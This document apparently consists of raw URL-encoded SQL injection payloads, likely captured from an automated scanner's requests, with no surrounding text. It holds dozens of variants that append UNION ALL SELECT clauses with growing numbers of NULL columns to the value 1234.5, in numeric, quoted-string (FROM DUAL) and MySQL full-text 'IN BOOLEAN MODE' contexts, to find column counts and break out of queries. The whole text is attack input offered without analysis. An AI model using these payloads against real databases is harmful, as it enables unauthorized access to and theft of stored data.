1234.5%20%2B%20%28SELECT%206470%20WHERE%209155%3D9155%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209998%20WHERE%208215%3D8215%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%208008%20WHERE%206421%3D6421%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%202290%20WHERE%209238%3D9238%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%209909%20WHERE%207062%3D7062%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%20%2B%20%28SELECT%207622%20WHERE%206563%3D6563%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1234.5%27%20%2B%20%28SELECT%20%27caLY%27%20FROM%20DUAL%20WHERE%201875%3D1875%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27axvC%27%20FROM%20DUAL%20WHERE%207712%3D7712%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27AxuI%27%20FROM%20DUAL%20WHERE%205017%3D5017%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lNOC%27%20FROM%20DUAL%20WHERE%202199%3D2199%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27dHcp%27%20FROM%20DUAL%20WHERE%201863%3D1863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27fQId%27%20FROM%20DUAL%20WHERE%206937%3D6937%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27aFyj%27%20FROM%20DUAL%20WHERE%205154%3D5154%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27aRJM%27%20FROM%20DUAL%20WHERE%209794%3D9794%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YICx%27%20FROM%20DUAL%20WHERE%202809%3D2809%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27LgdF%27%20FROM%20DUAL%20WHERE%208547%3D8547%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27HqJw%27%20WHERE%209343%3D9343%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27nyfw%27%20WHERE%203388%3D3388%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ejIX%27%20WHERE%203713%3D3713%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27fOvR%27%20WHERE%209317%3D9317%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27iadh%27%20WHERE%203361%3D3361%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27SfhO%27%20WHERE%202241%3D2241%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27joHa%27%20WHERE%205992%3D5992%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lBdO%27%20WHERE%207816%3D7816%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27aTqF%27%20WHERE%205857%3D5857%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27LZrX%27%20WHERE%207106%3D7106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 